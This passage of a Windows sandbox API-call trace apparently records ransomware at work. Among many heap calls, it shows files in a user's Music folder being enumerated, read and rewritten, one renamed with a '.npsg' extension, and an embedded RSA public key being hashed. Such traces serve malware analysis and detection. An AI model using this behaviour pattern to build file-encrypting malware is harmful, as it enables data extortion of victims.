Flags=0x0, Size=0x100) returned 0x33b8188 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b879d8 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.039] GetCurrentThreadId () returned 0x5b4 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0239.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ce0 [0239.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c80 [0239.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c98 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c68 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cf8 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cc8 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cb0 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d10 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cb0 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0239.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c80 [0239.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ce0 | out: hHeap=0x620000) returned 1 [0239.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0239.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d10 | out: hHeap=0x620000) returned 1 [0239.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0239.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0239.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0239.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cf8 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c50 | out: hHeap=0x620000) returned 1 [0239.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86438 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.044] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x100fe, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x100fe, lpOverlapped=0x0) returned 1 [0239.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.045] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10103, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.045] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.045] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.045] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.046] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.046] CloseHandle (hObject=0x644) returned 1 [0239.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0239.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b88cd0 [0239.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0239.051] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\U5upCFkkWLgS8Bd.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\u5upcfkkwlgs8bd.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\U5upCFkkWLgS8Bd.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\u5upcfkkwlgs8bd.m4a.npsg")) returned 1 [0239.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0239.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.052] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.053] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30d29b80, ftCreationTime.dwHighDateTime=0x1d5b608, ftLastAccessTime.dwLowDateTime=0x7508d110, ftLastAccessTime.dwHighDateTime=0x1d5b997, ftLastWriteTime.dwLowDateTime=0x7508d110, ftLastWriteTime.dwHighDateTime=0x1d5b997, nFileSizeHigh=0x0, nFileSizeLow=0x7d84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X7 lGND.wav", cAlternateFileName="X7LGND~1.WAV")) returned 1 [0239.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.054] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\X7 lGND.wav") returned=".wav" [0239.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\X7 lGND.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\x7 lgnd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.054] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=32132) returned 1 [0239.054] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.057] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7d5e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.057] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.059] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.059] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x7d84, lpOverlapped=0x0) returned 1 [0239.060] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.060] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.061] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.062] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.062] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.062] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.062] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.062] GetLastError () returned 0x0 [0239.062] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.062] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.062] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.062] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.062] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d80) returned 0x3b95d50 [0239.063] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86438 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c50 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86480 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c68 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c98 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cf8 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cb0 [0239.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.064] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0239.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0239.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cf8 | out: hHeap=0x620000) returned 1 [0239.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cf8 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cb0 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400c98 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0239.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.065] 